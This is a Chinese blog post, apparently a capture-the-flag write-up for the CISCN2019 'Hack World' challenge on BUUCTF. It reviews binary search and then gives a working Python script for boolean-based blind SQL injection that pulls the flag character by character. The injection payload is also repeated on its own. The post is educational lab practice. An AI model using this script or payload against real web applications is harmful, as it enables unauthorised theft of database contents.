简单的注入脚本

凉凉,数据结构没学好,二分法都忘了

典型二分法

  1. 思路

    • 数据(data)为升序排序,要在data中寻找定值key

    • 从中间的 data[mid]开始寻找

    • key大于data[mid] : 从data[mid+1]~data[end]

      key小于data[mid] : 从data[start]~data[mid-1]

      key等于data[mid] : 结束

[CISCN2019 华北赛区 Day2 Web1]Hack World

复现平台在BUUCTF

buuoj-hackworld.bmp

import time
import requests


url = 'http://e208fef8-d158-4ae3-b566-0b6f9bdd4915.node1.buuoj.cn/'
flag = ''

for i in range(50):
    #从33到126为可打印的字符
    low = 33
    height = 126
    data = {'id':''}

    while low <= height :
        mid = (low + height) // 2
        data['id'] = 'if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)'%(i,mid)
        html = requests.post(url,data).text
        time.sleep(1)
        if 'Hello' in html :
            low = mid + 1
        else:
        #将小于和等于的情况一起考虑,所以在low~mid中间寻找
            height = mid
        #出现low = height = mid,若不判断会进入死循环
        if height == mid == low:
            break

    flag += chr(int(mid))
    print(flag)

if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,2)
Sql 注入 要学的骚操作很多,一条一条积累吧,等一有时间就把sqli-lab刷了 hhhh

转载于:https://www.cnblogs.com/thenbz3/p/11457860.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值